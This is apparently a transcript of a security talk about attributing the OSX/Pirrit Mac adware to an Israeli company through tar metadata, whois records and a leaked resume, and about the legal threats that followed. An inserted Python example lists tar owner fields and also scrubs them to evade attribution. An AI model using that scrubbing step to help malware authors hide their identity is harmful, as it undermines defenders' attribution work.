So as I said, they're really good at opsec, right? So you can actually run macver in debug mode and you'll get all the output. So here's a nice example: so I went to Google, I wrote "error", right, so you can see, and this, like, runs every second, and you can see that it got the full URL of what I was looking for, here's the query, right, and then it said okay, let me give you, like, let me give you this ad that's served from loadingpages.info, and here's the JavaScript, and here's the identifier of my machine. So they know exactly who I am, even though they say they don't.

Here's the address, https google blah blah blah, and then I got an ad for a fake AV, this time it's called MacKeeper. Any of you heard about MacKeeper? Show of hands. Okay, so MacKeeper, wow, that would be awesome if I will get sued by them as well. MacKeeper are, like, if you'll Google them, you'll see that something isn't really linked straight in there. They actually hired a guy who, I won't say his name, and they used to release a report, and the report said "the MacKeeper Security Research Center". They're basically, their whole point is selling you a fake AV: like, they're infecting you and then they're saying, oh, like, we're the only

ones that can remove OSX/Pirrit from your machine, buy our AV, and then you buy their AV and you get AIDS. So, and there's a market, like MacKeeper, and they were sued, and there was a kill, like, it's all in Google, like, I'm not making it up. So you get ads for them, and you get all sorts of weird ads, so like here you can see, I have a screenshot, I remembered, I googled "error" and then, like, I had this tab opening: "attention, clean your Mac, virus scan is recommended for Macs". It's also recommended for humans, I think, if you go to, like, to get your physicals, kids. So this is how basically things are

working. Now let's talk about attribution, because at the beginning I said, like, the reason why TargetingEdge started sending me, like, threat letters was I wrote on Twitter "the idiots from TargetingEdge are at it again", and they didn't like it. So when I found out who they are, it was actually because it was super lazy, and it's in one of my reports. So I downloaded another one of their payloads, and I think my VM was acting up and I didn't want to open it on my machine, I didn't want to unpack the archive on my machine, so I said okay, I just want to see which files are in there. So

it was a tar archive, so with tar you can just list the files that are in the tar without extracting them. It's basically like doing an ls inside the tar. Now the cool thing, and I didn't even think about that back then, because of the fact that tar is a POSIX file format, when you create a tar archive, it will create a tar archive and inside the tar archive it'll save the original ownership metadata of the file inside the tarball. And where it says now "batman staff", it had the names of, like, their VP R&D and one of their devs, because who thought about it, right? So they

actually developed it on their own machine, like, the full name, like first name and last name, was their username. So again, because I told everyone that that's how they do it, they now changed it to batman. However, all the names of the files are the same now, even though in all of their letters they insisted that they have absolutely nothing to do with OSX/Pirrit, like, they have nothing to do, when they said "you shamed us on stage, we have nothing to do with this, you smeared TargetingEdge's fine name", and I was saying, your names were in there, like, I'm not lying. But the thing is that I can do this attribution again, mainly
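The attribution trick in the two paragraphs above rests on one property of the tar format: each member header carries the owner and group name of the file as it sat on the packager's disk, so `tar -tvf` on a payload shows who built it without extracting anything. The example below is added here and is not from the talk or from Cybereason's report; it builds a small archive in memory, lists the ownership the way `tar -tvf` would, and then rewrites it with neutral ownership to show what the authors later did with "batman". The member names, the owner name `jane.doe` and the group `staff` are constructed for the example and are not the real developers' names.

```python
"""What a tar listing reveals about who packaged an archive, and how to scrub it.

Added example, not from the talk or Cybereason's report. The archive is built in
memory; "jane.doe"/"staff" and the member names are constructed placeholders.
"""
import io
import tarfile
from typing import Dict, List, Tuple

# Fixed timestamp so the archive bytes are reproducible between runs.
FIXED_MTIME = 1_524_000_000


def build_tarball(members: Dict[str, bytes], uname: str, gname: str,
                  uid: int = 501, gid: int = 20) -> bytes:
    """Create an uncompressed tarball, stamping every member with the given owner,
    which is what `tar -cf` does with the files it reads off a developer's machine."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            info.mtime = FIXED_MTIME
            info.mode = 0o755 if name.endswith(".sh") else 0o644
            info.uid, info.gid = uid, gid
            info.uname, info.gname = uname, gname  # the fields that leak identity
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def list_owners(tar_bytes: bytes) -> List[Tuple[str, str, str, int, int]]:
    """Equivalent of `tar -tvf`: (name, uname, gname, uid, gid) per member, no extraction."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tar:
        return [(m.name, m.uname, m.gname, m.uid, m.gid) for m in tar.getmembers()]


def format_listing(tar_bytes: bytes) -> List[str]:
    """Render the listing in the owner/group column style tar -tv uses."""
    return [f"{uname}/{gname} {uid}:{gid} {name}" for name, uname, gname, uid, gid in list_owners(tar_bytes)]


def leaked_identities(tar_bytes: bytes) -> List[str]:
    """Owner names that look like a person rather than a generic system account."""
    generic = {"", "root", "nobody"}
    return sorted({uname for _, uname, _, _, _ in list_owners(tar_bytes)} - generic)


def scrub_owners(tar_bytes: bytes, uname: str = "", gname: str = "",
                 uid: int = 0, gid: int = 0) -> bytes:
    """Rewrite the archive with neutral ownership. GNU tar does the same at creation
    time with --owner/--group (bsdtar on macOS: --uname/--gname)."""
    out = io.BytesIO()
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as src, \
            tarfile.open(fileobj=out, mode="w") as dst:
        for member in src.getmembers():
            member.uname, member.gname = uname, gname
            member.uid, member.gid = uid, gid
            dst.addfile(member, src.extractfile(member) if member.isfile() else None)
    return out.getvalue()


# Constructed sample payload: shaped like an adware installer, contents are placeholders.
SAMPLE_MEMBERS = {
    "installer/postinstall.sh": b"#!/bin/sh\necho constructed sample\n",
    "installer/payload.bin": b"\x00" * 16,
}
LEAKY_TAR = build_tarball(SAMPLE_MEMBERS, uname="jane.doe", gname="staff")
CLEAN_TAR = scrub_owners(LEAKY_TAR, uname="batman", gname="staff")

if __name__ == "__main__":
    print("as built:", *format_listing(LEAKY_TAR), sep="\n  ")
    print("leaked:", leaked_identities(LEAKY_TAR))
    print("scrubbed:", *format_listing(CLEAN_TAR), sep="\n  ")
```

Two things worth noting for both sides of this. For the analyst, listing is safe because nothing is written to disk, which is exactly why the speaker could do it on a machine where he did not want to unpack the payload; `list_owners` never calls `extractall`. For the packager, scrubbing the owner fields does not touch member names or timestamps, which is why the speaker could still match the rebuilt archives by file names: identity leaks through more than one header field.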

for two reasons. One, I've done this before, and the way that I found them, with, like, all the YARA rules and stuff, I didn't put everything in my reports. I saved some for myself, because I like opsec, and now I have a pretty good knowledge of their, like, coding style and TTPs and whatever. So what do we have so far? We have code that looks almost identical to the code from two years ago, right? We have methods, the scripts, the names of things, the servers, the way that everything, like, ties together, and it's almost identical to my findings from two years ago. And we also have frantic letters from their attorneys telling us that it's not them,

which is obviously [ __ ], but they're telling us "this is not us, and don't publish anything that's related to our intellectual property". All of this, if anyone follows me on Twitter, I had, like, a crazy thing with her, like, two weeks ago. Now, with all of this, this is not really proof. So what is proof? So let's talk about domains, right. So when TargetingEdge are buying their domains, they usually buy them in batches of eight or ten, like, that's what I saw on ThreatCrowd, but there was one batch where they didn't pay the extra whatever dollars for the domain privacy. So there were a bunch of domains that were all linked

to an IP address, because it was different domains tied to the same server, and those domains were registered by the name of the CEO at targetingedge.com. It's not them, right? So if you do a simple whois, you see that the admin organization is TargetingEdge and the admin name is literally their CEO, and, like, here's their office address, which is actually not really far from our own office in Tel Aviv. But we also have a resume of their employee, who really liked my report and wanted to work for us, and in his resume he said "my work appeared in Cybereason Labs report" and "in itnew.com article". You can't make this [ __ ] up, seriously.

Seriously, wow, the letter that I'm gonna get in a few days, oh boy. Now here's the funny thing: remember that "we don't use any exploits and it's all fine"? If you click the link of the second one, the itnew.com article, you get this: one of their adware, not Pirrit, another one, exploited the well-known, now not zero-day anymore, rootpipe exploit in OS X. "We're not using any exploits." Their own employee literally wrote that on his resume. I don't know what to tell you guys, and basically that wraps everything up. [Applause] So before I take questions, if you guys have, because you guys have them, because we wrapped up

nine minutes before time is up, I need to take a selfie with you all. Yay, okay, FOMO. Okay, so just a few words. I couldn't do all of this, and I couldn't stand on the stage and, like, talk in, like, being so calm and basically just [ __ ]-posting live on stage on this company, if it weren't for our legal department, who worked with me, and this was, like, a thing that we did together. I sat with one of our corporate counsels, and, like, we were together on this, and every letter that they sent us we had to address, like, every letter,

everything, every word that was on this letter I had to sit down with our attorney, that is not a technical guy, like, he is technical to a certain level, right, he doesn't know how to reverse engineer code, and I had to sit with him with IDA Pro and tell him, here, you see, here they say that they don't do that, here they're doing that, right here. So if you end up being in a case where you reverse engineer something and you're doing research and you're starting to get threat letters, don't act on your own, don't be a hero, don't say, oh, [ __ ] them, I can do everything by myself, because you have to

have a guy that knows the law that works with you, a guy or a girl, someone, right, inclusion. It's not funny. You have to have someone that knows what he's doing or what she's doing. Wow, we don't have this problem in Hebrew. No, I'm, I, like everyone, I'm fine, believe me. So this is super important: like, if you end up getting legal threats, and it's not the first case where adware companies send legal threat letters to researchers, I think it's just the funniest one, and I'm sure that I'm going to run into them again, because my YARA rules are still working, and, you know what, even though

after all of that happened, they're still, like, doing their thing. Like, people still get infected. Like, after my old research they were quiet for a while, and they got back, and now they have lawyers, which they didn't have before. So this is nuts. And yeah, and if you're interested in all of that and you want to get to the more technical aspects, feel free, like, you're all welcome to read the report on the Cybereason blog. It's super long and super detailed. I couldn't cram all the information into this deck, because I also had to tell the story, which is really fun. And, any of you have any questions?

Those are essentially burner domains, right? They have to keep on setting those up.

Domains are actually, like, small change. A domain, you can get a domain for six bucks for two years, or a year, it doesn't matter, like, domains are small change. Like, when they used to do the Apple certificates, every certificate is 99, and it's 99, it's not only 99 dollars, like, you have to give them an excuse why you want this certificate, and you have to send them, like, photo ID and stuff, and someone needs to work, like, there's a graphic designer there that probably just, like, generates passports or something super illegal. So I honestly, like, and I was talking about it with our legal department, like, how do they make

money, like, running such an operation, all the servers, hiring devs, like, all of this, it costs money. I guess they're making money, like, honestly, like, this is expensive. This is not, it's not like, you know, it's not like running a giant megacorp, like, it's not that expensive, but it's not cheap. So I honestly don't know how do they make a profit out of this, but I guess they do.

[ __ ], no. When I got his resume, so it was February of last year, I went to meet my family in London, I landed in Boston, I turn on my phone, the recruiter from Tel Aviv sends me an email, "you gotta see this", like, that was the subject. Usually that's things I don't click on, and it was that guy's resume, and I was like, what the [ __ ], who does that? And the answer is no. He, however, I checked a while ago, I don't know, I checked, like, eight months ago, he works at a security company.

So with the first version of Pirrit I wrote a bunch of removal scripts, and I put them on my own GitHub, but the problem was that every time, like, they released a new version every day, because it was actually effective, because the first Pirrit was, like, an outbreak, and I couldn't keep up. Like, I can't, like, reverse engineer this malware every day, because I have other things to do. So what I did is I shared it with a bunch of colleagues from other companies, and, like, back then we didn't have, like, today we have an antivirus, like an NGAV, because of course, back then we didn't

have it. So actually other companies, I think Malwarebytes, put in the signature in their product, and then it became a thing, and then the IOCs were in AlienVault, so other AV companies just started basing their signatures off of that. So I think that with Pirrit, every AV that's up to date will remove it now. Because of that, after that thing happened, the same thing, I did the same thing, yeah. Time's up, okay, if anyone wants to ask me questions I'm outside. Thank you very much.